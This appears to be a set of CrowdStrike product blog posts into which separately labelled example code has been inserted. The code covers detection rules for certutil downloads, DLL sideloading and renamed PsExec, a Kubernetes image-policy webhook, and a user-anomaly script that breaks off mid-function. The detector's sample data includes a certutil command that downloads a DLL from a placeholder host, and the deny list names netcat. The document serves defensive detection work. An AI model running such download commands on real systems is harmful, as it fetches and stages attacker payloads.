Falcon Next-Gen SIEM offers unmatched efficiency in stopping phishing attacks by accurately detecting threats, visualizing high-risk activity in live dashboards, automating repetitive tasks, and streamlining investigations. With Falcon Next-Gen SIEM, threat detection and response has never been easier.

If you’re a Falcon Insight customer, you can extend the visibility and protection of the Falcon platform to third-party data with the 10GB/day plan. Discover how you can achieve up to 150x faster search performance and up to 80% lower cost than legacy SIEM solutions with Falcon Next-Gen SIEM. Speak to your CrowdStrike account representative to learn how you can modernize your SOC with the next generation of SIEM technology.


Unlock Advanced Security Automation for Next-Gen SIEM

20 June 2024 at 23:20

According to the CrowdStrike 2024 Global Threat Report, the fastest recorded eCrime breakout time was just 2 minutes and 7 seconds in 2023. This underscores the need to equip security analysts with modern tools that level the playing field and enable them to work more efficiently and effectively.

Today’s analysts require a new generation of security information and event management (SIEM) technology capable of scaling to manage petabytes of data, working seamlessly with security orchestration, automation and response (SOAR) capabilities to stop breaches.

CrowdStrike Falcon® Fusion SOAR, the no-code orchestration, automation and response capability built into the CrowdStrike Falcon® platform, is now available to enable workflow automation for third-party data with CrowdStrike Falcon® Next-Gen SIEM. Legacy SIEMs have failed the SOC, but Falcon Next-Gen SIEM introduces a new approach to eliminate slow queries, complex architectures and costly data ingestion. With its new features and enhancements, Falcon Fusion SOAR is well-positioned to help your security team realize the benefits that automation can deliver.

Elevate SOC Efficiency and Accuracy with Workflow Automation

Security automation is your secret weapon to stopping attacks and improving your bottom line. It reduces the time needed to respond to threats, cuts the costs of integrating and operating tools, and improves your security analysts’ job satisfaction by eliminating repetitive tasks, allowing the team to focus on higher-level responsibilities that cannot be automated.

Automation can significantly enhance the efficiency of the SOC. While SIEMs excel at detecting threats by analyzing vast amounts of data, they still force security analysts to manually triage detections and filter out false positives. Many investigation tasks are repetitive and time-consuming, keeping teams from stopping real threats quickly. This is where SOAR steps in to boost efficiency, driving detections to resolution and establishing a continuous information loop.

Enhance Security Operations from Detection to Action

Falcon Fusion SOAR slashes response times during an investigation — when every second counts. It not only improves the technical effectiveness of security operations by working as a cohesive unit but also optimizes operational efficiency by breaking down information silos and eliminating data transfer delays. It ensures that data flows seamlessly and bi-directionally between Falcon Next-Gen SIEM and Falcon Fusion SOAR to act on the most current information available, providing you with a real-time view of your security posture and a feedback loop for continuous improvement.

Falcon Fusion SOAR can query both Falcon platform data and third-party data in Falcon Next-Gen SIEM to further threat investigations, and it can store data such as query results, ensuring that security teams have the most up-to-date view of their data. It also accelerates response, as Falcon Fusion SOAR can execute workflows that are triggered automatically from a Falcon Next-Gen SIEM detection, scheduled for continuous protection or launched on-demand in response to critical threats.

Additionally, Falcon Fusion SOAR has the ability to drive workflow automation based on Falcon platform alerts and data, such as endpoint, cloud and identity, as well as third-party data collected by Falcon Next-Gen SIEM. This consolidated solution provides you with unrivaled visibility into your data and significantly reduces the time spent on detection, investigation and response.

Figure 1. Optimize security operations efficiency and effectiveness with Falcon Next-Gen SIEM and Falcon Fusion SOAR.

Empowering Security Teams with No-Code Workflow Automation

Security analysts are often overwhelmed by the high number of alerts they must triage and respond to. While workflow automation is a powerful tool that can simplify security processes, cumbersome playbook development can hinder progress. Implementing orchestration and automation requires clearly defined processes, a deep understanding of the technologies being orchestrated and knowledge of how to translate these into automated processes. And often, complex decisions require human involvement. Given the advanced skills required to code playbooks and the scarcity of security talent, security teams need tools that prioritize a modern analyst experience and offer a significant advantage against adversaries.

As a native capability of Falcon Next-Gen SIEM, Falcon Fusion SOAR provides analysts with a unified experience that combines world-class security data and workflow automation to stop breaches. The newly redesigned workflow builder allows security analysts to easily visualize their workflows as they build them, with an intuitive top-to-bottom flow for improved readability and usability. Analysts can simply select different building blocks without needing to code, making automation accessible even to more junior analysts.

Figure 2. Deploy workflow automation in minutes with the new workflow builder interface.

Depending on the complexity of the workflow, building it can take only a few minutes. Once the use case has been identified, analysts need to select a trigger, define conditions and configure the actions. Falcon Fusion SOAR supports the orchestration of complex use cases with conditional branching and logic, and by seamlessly integrating with Falcon Real Time Response (RTR) to execute any action on the endpoint. When key decision making and approvals are necessary, team members can be notified via email, Slack or your preferred communication method as part of the workflow.

To give your team a headstart, Falcon Fusion SOAR offers a growing library of out-of-the-box playbooks for common use cases. These playbook templates can be easily customized to meet your organization’s policies and technology stack.

Falcon Fusion SOAR recently released a new phishing integration and playbook to help your team automate response to emails reported as phishing by employees in your organization. The workflow integrates with MS365, authorizing Falcon Fusion to have read-only access to your organization’s phishing inbox. When an email is reported as phishing, the workflow begins the investigation process by searching all email components for enrichment. If malicious indicators are identified, the workflow will quarantine or block indicators, update third-party tools and create custom IOCs to start a retroactive search.

Figure 3. Falcon Fusion SOAR’s new phishing playbook template will enable your team to deploy workflow automation as soon as an email is reported as a phishing email.

Optimize Incident Response with Workflow Automation Insights

Workflow automation helps security teams cut mean time to respond (MTTR) by gathering and enriching data, guiding analysts through investigations, and orchestrating and automatically remediating attacks. It also reduces the risk of human error by driving consistent, standardized actions. Additionally, it has the potential to improve your security posture by providing insights into trends and execution, helping to better understand performance, enhance collaboration and identify areas of improvement.

Falcon Fusion SOAR offers at-a-glance insights through a metrics dashboard that enables you to view detailed workflow executions, including the various actions executed by each workflow, and related detections. This comprehensive information, along with other trends, enhances the understanding of the status and context of an incident. All of this information is readily available in a unified view within the Falcon platform, thereby reducing “swivel-chair syndrome” for your team and allowing them to concentrate efforts on the most critical threats.

Figure 4. Understand and improve your security posture with SOAR insights at a glance.

Next-Level Threat Management with Falcon Next-Gen SIEM

With its native SOAR capabilities powered by Falcon Fusion SOAR, Falcon Next-Gen SIEM accelerates threat detection, investigation and response — all from a single console. This gives your team the speed to keep pace with adversaries and the focus to address the threats that put your organization at risk.


CrowdStrike Sets Speed Benchmark with Fastest-Ever Threat Detection in MITRE Engenuity ATT&CK® Evaluations: Managed Services, Round 2

18 June 2024 at 12:47

Security teams must outpace increasingly fast and sophisticated adversaries to stay ahead. In the most recent closed-book MITRE Engenuity ATT&CK® Evaluations: Managed Services, the CrowdStrike Falcon® platform once again demonstrated it stands alone in its ability to deliver the speed and efficacy needed to stop breaches.

  • CrowdStrike Falcon Complete® managed detection and response (MDR) sets a new speed benchmark, scoring the fastest mean time to detect (MTTD) at just 4 minutes — 6 to 11 times faster than competitive vendors.
  • CrowdStrike achieved the highest detection coverage score for the second consecutive year.

MITRE’s closed-book evaluation emulated a real-world eCrime attack without giving vendors prior knowledge of the threat scenario — creating the most accurate assessment of a vendor’s capabilities. In this scenario, prevention capabilities of the Falcon agent were not permitted. The Falcon platform was operating in detect-only mode, meaning no automated actions could be taken to kill processes.

MITRE does not rank or rate participants — the following is CrowdStrike’s analysis of the results provided by MITRE Engenuity.

We believe these results clearly demonstrate that the powerful combination of the Falcon platform, CrowdStrike’s elite team of experts and our knowledge of the adversary stands alone in the industry when it comes to stopping breaches. The Falcon platform once again achieved the highest detection coverage and fastest mean time to detect at just 4 minutes — an exceptional performance 6-11x faster than comparative vendors.

Organizations must rigorously evaluate MDR vendors and demand cutting-edge technology, unmatched expertise and proven outcomes. Only a unified approach ensures swift and effective threat detection, investigation and response. This is why the results from MITRE’s latest evaluation should be considered holistically. When reviewing these results, ask yourself: What good is speed if threats are missed? What good are actionable detections if they cannot be trusted or acted on quickly? What good is threat detection if detections happen too slowly to prevent breaches?

Not only did CrowdStrike achieve the highest detection coverage and fastest MTTD of all vendors evaluated, we also generated the highest number of actionable notifications and detections, showcasing our ability to drive superior security outcomes — namely, stopping breaches.

Figure 1. Mean time to detect (MTTD) in MITRE Engenuity ATT&CK Evaluations: Managed Services, Round 2

Unsurpassed Speed and Efficacy in MDR

CrowdStrike Falcon Complete MDR achieved remarkable results in the latest MITRE evaluation, building on our previous success in the MITRE Managed Services, Round 1 and the MITRE Enterprise evaluation. We achieved the highest detection coverage of all vendors evaluated.

The CrowdStrike 2024 Global Threat Report shows the average breakout time for eCrime is dropping rapidly, going from 84 minutes in 2022 to just 62 minutes in 2023. The fastest recorded breakout was just over 2 minutes. This real-world data shows every minute counts when sophisticated adversaries attack. With many cybersecurity solutions, by the time a SOC is aware of an intrusion, it’s too late — the adversary will have already moved on to their objective. Falcon Complete detects the attack immediately, preventing a breach.

Organizations must have confidence in their MDR provider’s ability to swiftly detect and eliminate threats with uncompromising efficiency. This closed-book evaluation, in which no vendor had advance notice of the adversary or their TTPs, accurately simulated a real-world attack and offered a precise assessment of each vendor’s ability to detect and report threats, registering MTTD as a critical metric. Vendor response and remediation were not evaluated.

The Falcon Complete team rapidly correlated intelligence and cross-domain data using the Falcon platform’s rich security telemetry, which encompasses endpoint, identity, cloud workloads, third-party data and integrated threat intelligence. CrowdStrike achieved these objectives with astounding speed and accuracy.

Figure 2. Detection coverage category scores in MITRE Engenuity ATT&CK Evaluations: Managed Services, Round 2

Identifying Sophisticated Tradecraft in MITRE Engenuity ATT&CK Evaluations: Managed Services, Round 2

CrowdStrike’s objectives in the evaluation were to investigate and provide context and analysis of Falcon platform detections in order to establish who the threat actor was, identify the earliest and most recent threat actor activity and determine how they gained access to the systems. We were required to present MITRE evidence, if any, that the threat actor accessed or exfiltrated data and identify potential lateral movement to other systems in the environment.

During the evaluation, we reviewed and monitored Falcon platform detections and relevant telemetry across native endpoint and identity data, and network and email third-party telemetry from CrowdStrike Falcon® Next-Gen SIEM, to perform remote triage analysis on impacted systems.

CrowdStrike identified that the MITRE ATT&CK Evaluations for Managed Services emulated the behavior of two sophisticated adversaries tracked as STONE PANDA and ALPHA SPIDER by CrowdStrike Counter Adversary Operations (known as menuPass and ALPHV BlackCat by MITRE).

Figure 3. Incident diagram created by Falcon Complete and the CrowdStrike Falcon® Adversary OverWatch team, mapping adversary techniques as the attack unfolded.

Learning How the Threat Actor Gained Access

The threat actor was first detected via a remote desktop connection from an unmanaged system, indicating that valid credentials were likely already compromised and used to initiate the attack. Specifically, the credentials for the “kizumi” account were utilized. Using the CrowdStrike Falcon® Identity Threat Protection module, Falcon Complete quickly identified that there were known risks with the account, including shared passwords with another account and a path to a privileged user.

Figure 4. Falcon Identity Threat Protection highlighting risks tied to the kizumi account

Identifying Threat Actor Activity

Once the threat actor had access to the environment, the native certutil.exe utility was used to download malicious binaries from threat actor-controlled infrastructure. These binaries were subsequently sideloaded into the legitimate application Notepad++ and identified to match Sigloader and QuasarRAT malware, confirming the STONE PANDA attribution.

In a real-world scenario, Falcon Complete would have stepped in to contain the host and block authentication for the account using the Falcon Identity Threat Protection module. The customer would have then received a remediation notice via email or Message Center, informing them of the steps taken by Falcon Complete to eradicate the threat.

Figure 5. Certutil.exe used to download malicious DLL VERSION.dll

Figure 6. Notepad++.exe sideloading VERSION.dll to load QuasarRAT

Identifying Potential Lateral Movement

Once command-and-control (C2) connectivity had been established, CrowdStrike observed the threat actor use QuasarRAT malware to conduct keylogging activity, allowing them to attain credentials for the domain administrator account. Falcon Complete quickly obtained a process memory dump of the Notepad++ process utilizing Falcon Real Time Response to validate that the credentials for kizumi.da had been captured by the keylogger and stored locally on the system under the file path C:\Users\kizumi\AppData\Roaming\Logs\2024-03-25-log. Subsequently, this keylogger file was observed being exfiltrated back to the threat actor’s C2 infrastructure.

The threat actor then used their valid credentials with domain administrator privileges, conducting additional network reconnaissance to identify high-value targets — including a Domain Controller, which was targeted for further credential theft. In addition, the threat actor abused the Server Message Block (SMB) protocol to transfer files throughout the environment.

Later, the threat actor used tooling matching indicators consistent with ExMatter to search for and gather potentially sensitive information such as Microsoft Office documents and image files from multiple systems. This allowed Falcon Complete to conclude a second adversary, ALPHA SPIDER/BlackCat, was involved. The data was then exfiltrated via SFTP to threat actor-controlled infrastructure.

Figure 7. ExMatter data exfiltration via SFTP to threat actor-controlled domain

As the threat actor’s final act, a ransomware binary was downloaded and executed remotely across all victim systems via a renamed copy of PsExec.exe. This destructive act encrypted files, terminated critical processes and performed actions that would inhibit system recovery.
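Three of the behaviours in this chain are cheap to detect from ordinary process and module-load telemetry, and the added example below shows the logic for each: certutil.exe fetching a file from a URL (ATT&CK T1105), a system DLL name such as VERSION.dll being loaded from an application directory rather than the Windows system directory (T1574.002), and a binary whose version-info OriginalFileName says PsExec while its on-disk name does not (T1036). This is not CrowdStrike or Falcon code; the event shape (`type`, `image`, `cmdline`, `original_file_name`, `module`), the hosts, paths and the download URL are constructed for illustration, and the `SIDELOAD_DLL_NAMES` set holds only the DLL named on this page and should be extended from your own inventory.

```python
"""Flag certutil downloads, system-DLL sideloading and renamed PsExec over
constructed process and module-load events (JSON lines).

Added example, not CrowdStrike or Falcon code. Event fields, hosts, paths and
URL are constructed; the ATT&CK technique IDs are the public ones.
"""
from __future__ import annotations

import json
from pathlib import PureWindowsPath

# Constructed telemetry; backslashes are JSON-escaped inside the raw string.
SAMPLE_EVENTS = r"""
{"type": "process", "host": "ws-01", "image": "C:\\Windows\\System32\\certutil.exe", "original_file_name": "CertUtil.exe", "cmdline": "certutil.exe -urlcache -split -f http://download.placeholder.invalid/VERSION.dll VERSION.dll"}
{"type": "process", "host": "ws-01", "image": "C:\\Program Files\\Notepad++\\notepad++.exe", "original_file_name": "notepad++.exe", "cmdline": "notepad++.exe"}
{"type": "module_load", "host": "ws-01", "image": "C:\\Program Files\\Notepad++\\notepad++.exe", "module": "C:\\Program Files\\Notepad++\\VERSION.dll"}
{"type": "module_load", "host": "ws-01", "image": "C:\\Windows\\explorer.exe", "module": "C:\\Windows\\System32\\version.dll"}
{"type": "process", "host": "ws-02", "image": "C:\\Windows\\Temp\\svchosts.exe", "original_file_name": "PsExec.exe", "cmdline": "svchosts.exe"}
{"type": "process", "host": "ws-02", "image": "C:\\Windows\\System32\\certutil.exe", "original_file_name": "CertUtil.exe", "cmdline": "certutil.exe -verify cert.cer"}
"""

# Directories from which the named DLLs are legitimately loaded.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# DLL names seen sideloaded on this page; extend from your own inventory.
SIDELOAD_DLL_NAMES = {"version.dll"}


def finding(rule: str, technique: str, event: dict, detail: str) -> dict:
    return {"rule": rule, "technique": technique, "host": event["host"],
            "image": event["image"], "detail": detail}


def detect(events_text: str) -> list[dict]:
    """Apply the three rules to every event and return the findings in order."""
    findings: list[dict] = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event["type"] == "process":
            image = PureWindowsPath(event["image"])
            cmdline = event.get("cmdline", "")
            lowered = cmdline.lower()
            # Rule 1: certutil used as a downloader (urlcache switch plus a URL).
            if (image.name.lower() == "certutil.exe" and "urlcache" in lowered
                    and ("http://" in lowered or "https://" in lowered)):
                findings.append(finding("certutil_download", "T1105", event, cmdline))
            # Rule 3: PE version info says PsExec, on-disk name says otherwise.
            ofn_stem = PureWindowsPath(event.get("original_file_name", "")).stem.lower()
            if ofn_stem == "psexec" and image.stem.lower() not in {"psexec", "psexec64"}:
                findings.append(finding("renamed_psexec", "T1036", event, event["image"]))
        elif event["type"] == "module_load":
            module = PureWindowsPath(event["module"])
            # Rule 2: a system DLL name loaded from outside the system directories.
            if (module.name.lower() in SIDELOAD_DLL_NAMES
                    and str(module.parent).lower() not in SYSTEM_DIRS):
                findings.append(finding("dll_sideload", "T1574.002", event, event["module"]))
    return findings


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(json.dumps(hit))
```

The benign control events (explorer.exe loading version.dll from System32, certutil.exe run with -verify) produce no findings, which is the check worth keeping when you tune these rules against real telemetry: the sideload rule keys on the load path, not the DLL name alone, and the certutil rule requires both the download switch and a URL.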

It should be noted that had this not been a controlled simulation, at any point from the first detection onward Falcon Complete would have enacted countermeasures such as network containment, artifact remediation via Falcon Real Time Response, or the blocking of affected accounts via Falcon Identity Threat Protection in order to stop the breach — all while maintaining close communications with the customer. Our comprehensive response capabilities set Falcon Complete apart from any other managed service.

We Dominated the Evaluation — and CrowdStrike Offers Even More

While these test results are fantastic for CrowdStrike and our customers, they don’t come close to telling the full story of the power of the Falcon platform and CrowdStrike services.

Falcon Complete delivers full-cycle remediation: The “R” in “MDR” was notably absent in this evaluation, which focused solely on detecting and reporting adversary activity and did not extend to response or remediation. Most MDR services stop at identifying and investigating threats, leaving the response to the customer with “guided recommendations.” Falcon Complete goes beyond this by performing surgical remediation for endpoints, identities and cloud workloads, containing hosts, removing malicious artifacts and restoring systems to their normal state.

Falcon Adversary OverWatch unearths unknown, advanced attacks: MITRE didn’t specifically evaluate Falcon Adversary OverWatch, but Falcon Adversary OverWatch threat hunters were involved in the active evaluation and were crucial in identifying and reporting steps to MITRE. As adversaries evolve their tradecraft to evade automated detections, Falcon Adversary OverWatch quickly adapts and adjusts to make sense of early signals and complex attack patterns to uncover previously unknown threats.

Falcon Next-Gen SIEM: CrowdStrike Falcon Next-Gen SIEM integrates key data and threat intelligence, including third-party data, into a single console so analysts can see the full scope of any attack with instant correlation of Falcon and third-party sources. With CrowdStrike’s industry-leading threat intelligence and investigation, Falcon Next-Gen SIEM simplifies and accelerates investigations.

Falcon Prevent was disabled: Prevention capabilities of the Falcon agent were not permitted. This highlights the skill of the Falcon Complete team, which was still able to achieve the highest detection coverage and provide recommendations to MITRE in record time. In a real-world scenario, CrowdStrike’s experts, combined with the full capabilities of the Falcon platform, would have disrupted all of the attack attempts before attackers could achieve their objectives, and most of the activity would have been stopped at first contact.

CrowdStrike strongly values participation in independent testing and evaluation. Exercises like the MITRE Engenuity ATT&CK® Evaluations: Managed Services evaluation give customers invaluable, unbiased insight into the performance of cybersecurity solutions. They provide insights into critical features and capabilities and how these will affect the outcome when protecting against real-world adversaries. Participating in these tests also drives innovation, helping CrowdStrike to develop new features that support our mission of stopping breaches.


New CrowdStrike Capabilities Simplify Hybrid Cloud Security

16 May 2024 at 16:17

CrowdStrike is excited to bring new capabilities to platform engineering and operations teams that manage hybrid cloud infrastructure, including on Red Hat Enterprise Linux and Red Hat OpenShift.

Most organizations operate on hybrid cloud [1], deployed to both private data centers and public clouds. In these environments, manageability and security can become challenging as the technology stack diverges among various service providers. While using “the right tool for the job” can accelerate delivery for IT and DevOps teams, security operations teams often lack the visibility needed to protect all aspects of the environment. CrowdStrike Falcon® Cloud Security combines single-agent and agentless approaches to comprehensively secure modern applications whether they are deployed in the public cloud, on-premises or at the edge.

In response to the growing need for IT and security operations teams to protect hybrid environments, CrowdStrike was thrilled to be a sponsor of this year’s Red Hat Summit — the premier enterprise open source event for IT professionals to learn, collaborate and innovate on technologies from the data center and public cloud to the edge and beyond.

Securing the Linux core of hybrid cloud

While both traditional and cloud-native applications are often deployed to the Linux operating system, specific Linux distributions, versions and configurations pose a challenge to operations and security teams alike. In a hybrid cloud environment, organizations require visibility into all Linux instances, whether they are deployed on-premises or in the cloud. But for many, this in-depth visibility can be difficult to achieve.

Administrators using Red Hat Insights to manage their Red Hat Enterprise Linux fleet across clouds can now more easily determine if any of their Falcon sensors are running in Reduced Functionality Mode. CrowdStrike has worked with Red Hat to build custom recommendations for the Red Hat Insights Advisor service, helping surface important security configuration issues directly to IT operations teams. These recommendations are available in the Red Hat Hybrid Cloud Console and require no additional configuration.

Figure 1. The custom recommendation for Red Hat Insights Advisor identifies systems where the Falcon sensor is in Reduced Functionality Mode (RFM).

Security and operations teams must also coordinate on the configuration and risk posture of Linux instances. To assist, CrowdStrike Falcon® Exposure Management identifies vulnerabilities and remediation steps across Linux distributions so administrators can reduce risk. Exposure Management is now extending Center for Internet Security (CIS) hardening checks to Linux, beginning with Red Hat Enterprise Linux. The Falcon platform’s single-agent architecture allows these cyber hygiene capabilities to be enabled with no additional agents to install and minimal system impact.

Even with secure baseline configurations, ad-hoc questions about the state of the fleet can often arise. CrowdStrike Falcon® for IT allows operations teams to ask granular questions about the status and configuration of their endpoints. Built on top of the osquery framework already popular with IT teams, and with seamless execution through the existing Falcon sensor, Falcon for IT helps security and operations consolidate more capabilities onto the Falcon platform and reduce the number of agents deployed to each endpoint.

Operationalizing Kubernetes security

While undeniably popular with DevOps teams, Kubernetes can be a daunting environment to protect for security teams unfamiliar with it. To make the first step easier for organizations using Red Hat and AWS’ jointly managed Red Hat OpenShift Service on AWS (ROSA), CrowdStrike and AWS have collaborated to develop prescriptive guidance for deploying the Falcon sensor to ROSA clusters. The guide documents installation and configuration of the Falcon operator on ROSA clusters, as well as best practices for scaling to large environments. This guidance now has limited availability. Contact your AWS or CrowdStrike account teams to review the guidance.

Figure 2. Architecture diagram of the Falcon operator deployed to a Red Hat OpenShift Service on an AWS cluster, covered in more depth in the prescriptive guidance document.

Furthermore, CrowdStrike’s certification of its Falcon operator for Red Hat OpenShift has achieved “Level 2 — Auto Upgrade” status. This capability simplifies upgrades between minor versions of the operator, which improves manageability for platform engineering teams that may manage many OpenShift clusters across multiple cloud providers and on-premises. These teams can then use OpenShift GitOps to manage the sensor version in a Kubernetes-native way, consistent with other DevOps applications and infrastructure deployed to OpenShift.

One of the components deployed by the Falcon operator is a Kubernetes admission controller, which security administrators can use to enforce Kubernetes policies. In addition to checking pod configurations for risky settings, the Falcon admission controller can now block the deployment of container images that violate image policies, including restrictions on a specific base image, package name or vulnerability score. The Falcon admission controller’s deploy-time enforcement complements the build-time image assessment that Falcon Cloud Security already supported.
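To make the deploy-time check concrete, here is an added example of the decision a validating admission webhook makes for a Pod: each container image is looked up in the results of an earlier image assessment, and the Pod is rejected if any image violates the base-image, package or vulnerability-score policy, or if a container asks for a risky setting such as privileged mode. This is not the Falcon admission controller or CrowdStrike code; the assessment table, policy values, image names and CVSS scores are constructed, and only the AdmissionReview request/response envelope follows the standard admission.k8s.io/v1 shape. One deliberate choice: an image with no assessment on record is rejected (fail closed), because an unscanned image is exactly the one that would otherwise slip past the policy.

```python
"""Image-policy enforcement at deploy time, in the shape of a Kubernetes
validating admission webhook.

Added example, not the Falcon admission controller. Assessment results,
policy, images and scores are constructed.
"""
from __future__ import annotations

# Constructed stand-in for build-time image assessment results, keyed by the
# image reference used in the Pod spec.
IMAGE_ASSESSMENTS = {
    "registry.example.test/web:2.1": {
        "base_image": "alpine:3.19", "packages": {"nginx", "openssl"}, "max_cvss": 5.3},
    "registry.example.test/worker:0.9": {
        "base_image": "debian:buster", "packages": {"python3", "netcat"}, "max_cvss": 9.8},
}

# Constructed policy. require_assessment=True rejects images never assessed.
POLICY = {
    "denied_base_images": {"debian:buster"},
    "denied_packages": {"netcat"},
    "max_cvss": 7.0,
    "require_assessment": True,
}


def image_violations(image_ref: str, policy: dict = POLICY) -> list[str]:
    """Return the policy violations for one image reference (empty if clean)."""
    assessment = IMAGE_ASSESSMENTS.get(image_ref)
    if assessment is None:
        return [f"{image_ref}: no image assessment on record"] if policy["require_assessment"] else []
    problems = []
    if assessment["base_image"] in policy["denied_base_images"]:
        problems.append(f"{image_ref}: base image {assessment['base_image']} is denied")
    bad_packages = assessment["packages"] & policy["denied_packages"]
    if bad_packages:
        problems.append(f"{image_ref}: denied packages {sorted(bad_packages)}")
    if assessment["max_cvss"] > policy["max_cvss"]:
        problems.append(f"{image_ref}: highest CVSS {assessment['max_cvss']} exceeds {policy['max_cvss']}")
    return problems


def pod_violations(pod: dict, policy: dict = POLICY) -> list[str]:
    """Check every container, init containers included, for image and setting issues."""
    spec = pod.get("spec", {})
    problems = []
    for container in spec.get("initContainers", []) + spec.get("containers", []):
        problems.extend(image_violations(container["image"], policy))
        if container.get("securityContext", {}).get("privileged"):
            problems.append(f"{container['name']}: privileged containers are not allowed")
    return problems


def admit(review: dict) -> dict:
    """Build the AdmissionReview response for an incoming review request."""
    request = review["request"]
    problems = pod_violations(request["object"])
    response = {"uid": request["uid"], "allowed": not problems}
    if problems:
        response["status"] = {"code": 403, "message": "; ".join(problems)}
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview", "response": response}


def make_review(pod: dict, uid: str = "00000000-0000-0000-0000-000000000001") -> dict:
    """Wrap a Pod in the request envelope the API server would send to the webhook."""
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "request": {"uid": uid, "kind": {"group": "", "version": "v1", "kind": "Pod"},
                        "operation": "CREATE", "object": pod}}


# Constructed Pods: one that violates the policy on several counts, one clean.
RISKY_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "batch"},
             "spec": {"containers": [
                 {"name": "worker", "image": "registry.example.test/worker:0.9",
                  "securityContext": {"privileged": True}},
                 {"name": "sidecar", "image": "registry.example.test/unscanned:latest"}]}}
CLEAN_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web"},
             "spec": {"containers": [{"name": "web", "image": "registry.example.test/web:2.1"}]}}

if __name__ == "__main__":
    for pod in (RISKY_POD, CLEAN_POD):
        print(admit(make_review(pod))["response"])
```

For the risky Pod the response is denied with five reasons (denied base image, denied package, CVSS above the ceiling, privileged container, unassessed sidecar image); the clean Pod is allowed. In a real deployment the same `admit` function would sit behind a TLS endpoint registered through a ValidatingWebhookConfiguration, and the assessment lookup would query the scanner rather than a dictionary.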

A strong and secure foundation for hybrid cloud

Whether you are managing 10 or 10,000 applications and services, the Falcon platform protects traditional and cloud-native workloads on-premises, in the cloud, at the edge and everywhere in between — with one agent and one console. Click here to learn more about how the Falcon platform can help protect Red Hat environments.

  1. https://www.redhat.com/en/global-tech-trends-2024


Falcon Fusion SOAR and Machine Learning-based Detections Automate Data Protection Workflows

15 May 2024 at 17:16

Time is of the essence when it comes to protecting your data, and often, teams are sifting through hundreds or thousands of alerts to try to pinpoint truly malicious user behavior. Manual triage and response take up valuable resources, so machine learning can help busy teams prioritize what to tackle first and determine what warrants further investigation.

The new Detections capability in CrowdStrike Falcon® Data Protection reduces friction for teams working to protect their organizational data, from company secrets and intellectual property to sensitive personally identifiable information (PII) or payment card industry (PCI) data. These detections are designed to revolutionize the way organizations detect and mitigate data exfiltration risks, discover unknown threats and prioritize them based on advanced machine learning models.

Key benefits of Falcon Data Protection Detections include:

  • Machine learning-based anomaly detections: Automatically identify previously unrecognized patterns and behavioral anomalies associated with data exfiltration.
  • Integration with third-party applications via CrowdStrike Falcon® Fusion SOAR workflows and automation: Integrate with existing security infrastructure and third-party applications to enhance automation and collaboration, streamlining security operations.
  • Rule-based detections: Define custom detection rules to identify data exfiltration patterns and behaviors.
  • Risk prioritization: Automatically prioritize risks by severity, according to the confidence in the anomalous behavior, enabling organizations to focus their resources on mitigating the most critical threats first.
  • Investigative capabilities: Gain deeper insights into potential threats and take proactive measures to prevent breaches with tools to investigate and correlate data exfiltration activities.

Potential Tactics for Data Exfiltration

The threat of data exfiltration looms over organizations of all sizes. With the introduction of Falcon Data Protection Detections, organizations now have a powerful tool to effectively identify and mitigate data exfiltration risks. Below, we delve into examples of how Falcon Data Protection Detections can identify data exfiltration via USB drives and web uploads, highlighting the ability to surface threats and prioritize them for mitigation.

For example, a disgruntled employee may connect a USB drive to transfer large volumes of sensitive data. Falcon Data Protection’s ML-based detections will identify when the number of files or file types moved deviates from that of a user’s or peer group’s typical behavior and will raise an alert, enabling security teams to investigate and mitigate the threat.

In another scenario, a malicious insider may attempt to exfiltrate an unusual file type containing sensitive data by uploading it to a cloud storage service or file-sharing platform. By monitoring web upload activities and correlating them against a user’s typical file types egressed, Falcon Data Protection Detections can identify suspicious behavior indicative of unauthorized data exfiltration — even if traditional rules would have missed these events.

In both examples, Falcon Data Protection Detections demonstrates its ability to surface risks associated with data exfiltration and provide security teams with the insights they need to take swift and decisive action. By using advanced machine learning models and integrating seamlessly with the rest of the CrowdStrike Falcon® platform, Falcon Data Protection Detections empowers organizations to stay one step ahead of cyber threats and protect their most valuable asset — their data.

Figure 1. A machine learning-based detection surfaced by Falcon Data Protection for unusual USB egress

Anomaly Detections: Using Behavioral Analytics for Comprehensive Protection

In the ever-evolving landscape of cybersecurity threats, organizations must continually innovate their detection methodologies to stay ahead of adversaries. Our approach leverages user behavioral analytics at three distinct levels — User Level, Peer Level and Company Level — to provide organizations with comprehensive protection and increase the accuracy of detections.

User Level: Benchmarks for Contextual History

At the User Level, behavioral analytics are employed to understand and contextualize each individual user’s benchmark activity against their own personal history. By analyzing factors such as file activity, access patterns and destination usage, organizations can establish a baseline of normal behavior for each user.

Using machine learning algorithms, anomalies that deviate from this baseline are flagged as potential indicators of data exfiltration attempts.

Peer Level: Analyzing User Cohorts with Similar Behavior

Behavioral analytics can also be applied at the Peer Level to identify cohorts of users who exhibit similar behavior patterns, regardless of their specific work functions. This approach involves clustering users based on their behavioral attributes and analyzing their collective activities. By extrapolating and analyzing user cohorts, organizations can uncover anomalies that may not be apparent at the User Level.

For example, if an employee and their peers typically only handle office documents, but one day the employee begins to upload source code files to the web, a detection will be created even if the volume of activity is low, because it is so atypical for this peer group. This approach surfaces high-impact events that might otherwise be missed by manual triage or rules based on static attributes.
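The two scenarios above (a bulk USB copy, and a single atypical file type uploaded to the web) and the User Level and Peer Level baselines can be seen working together in the following added example. It is toy detection logic written for this article, not Falcon Data Protection's models: the event schema, the z-score threshold, the minimum-history rule and the severity assignment are all assumptions, and the telemetry is constructed inline.

```python
"""Added example: user- and peer-level baselines over constructed egress telemetry.

Illustrative code written for this article; it is not Falcon's detection logic.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from statistics import mean, pstdev


@dataclass(frozen=True)
class EgressEvent:
    day: int        # constructed day index; baselines use the days before the one scored
    user: str
    peer_group: str
    channel: str    # "usb" or "web"
    file_type: str
    files: int      # number of files moved in this event


@dataclass
class Detection:
    user: str
    channel: str
    day: int
    signals: list = field(default_factory=list)   # human-readable reasons
    severity: str = "medium"


MIN_HISTORY_DAYS = 5   # assumption: below this there is no baseline, so volume is not scored
Z_THRESHOLD = 3.0      # assumption: standard deviations above the user's own mean


def _daily_totals(events):
    totals = defaultdict(int)
    for e in events:
        totals[(e.user, e.channel, e.day)] += e.files
    return totals


def user_level_volume_signals(events, day):
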